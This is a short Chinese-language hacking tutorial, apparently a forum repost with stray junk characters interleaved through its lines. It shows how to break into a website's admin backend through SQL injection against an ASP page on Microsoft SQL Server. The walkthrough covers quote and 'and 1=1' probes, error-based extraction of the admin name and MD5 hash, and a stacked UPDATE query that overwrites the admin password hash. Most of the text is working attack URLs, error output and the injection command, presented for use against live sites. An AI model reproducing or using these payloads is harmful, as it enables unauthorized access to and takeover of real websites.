经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
- N8 e! I- }) n2 T2 w可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
* r) l: n* m0 z _测试如下:
6 I8 p& o8 R( Yhttp://www.tmdsb.com/news.asp?id=121' n _: k9 x3 a1 K& N: k, @
在地址后输入单引号,显示
* ]0 P' K2 w: W+ f' @3 J tMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’, M7 C6 ^8 `/ V% b- N* K, T4 p
字符串 ’’’ 之前有未闭合的引号
2 t! Z% A/ w) K/news/tmdws.asp,行63
$ m: z6 I( m# K* R. n6 p说明没有过滤单引号且数据库是MSSQL.
5 Y% u6 @4 V i; K/ Pand 1=1正常。and 1=2出错。肯定存在注入
i$ @' H$ w& [. h4 i$ m7 W接着输入$ q5 a! B6 N- j2 j l0 q
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)3 @, A; f4 \$ m) \, O0 w5 m0 `
得到帐号为:admin+ t: [8 Q! H) b
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)5 `% p4 U3 D8 l. V6 t( B4 d
得到密码为:a4716077c2ba075c4 h$ T) Y: a0 A$ j# \3 s2 r
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433! C8 V! }6 g# Y: J* \8 ?5 x6 a
命令如下 :5 f; m( ~ |1 C6 c
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
0 m" z% K9 k! e: E这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |